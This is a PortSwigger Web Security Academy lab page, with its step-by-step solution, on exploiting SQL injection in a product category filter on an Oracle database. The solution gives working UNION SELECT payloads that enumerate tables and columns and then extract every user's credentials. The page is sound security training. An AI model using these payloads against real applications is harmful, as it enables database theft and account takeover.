Join us on May 15 for a live demo of how Burp Suite DAST solves real-world security challenges.            Register Now
Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Lab: SQL injection attack, listing the database contents on Oracle

PRACTITIONER

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the administrator user.

Hint

On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.

There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual

For more information, see our SQL injection cheat sheet.

ACCESS THE LAB

Solution

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.

  2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter:

    '+UNION+SELECT+'abc','def'+FROM+dual--

  3. Use the following payload to retrieve the list of tables in the database:

    '+UNION+SELECT+table_name,NULL+FROM+all_tables--
  4. Find the name of the table containing user credentials.

  5. Use the following payload (replacing the table name) to retrieve the details of the columns in the table:

    '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
  6. Find the names of the columns containing usernames and passwords.

  7. Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users:

    '+UNION+SELECT+USERNAME_ABCDEF,+PASSWORD_ABCDEF+FROM+USERS_ABCDEF--
  8. Find the password for the administrator user, and use it to log in.

Community solutions

Rana Khalil

Register for free to track your learning progress

The benefits of working through PortSwigger's Web Security Academy

  • Practise exploiting vulnerabilities on realistic targets.

  • Record your progression from Apprentice to Expert.

  • See where you rank in our Hall of Fame.

Already got an account? Login here

Try Burp Suite for Free

Find SQL injection vulnerabilities using Burp Suite

Try for free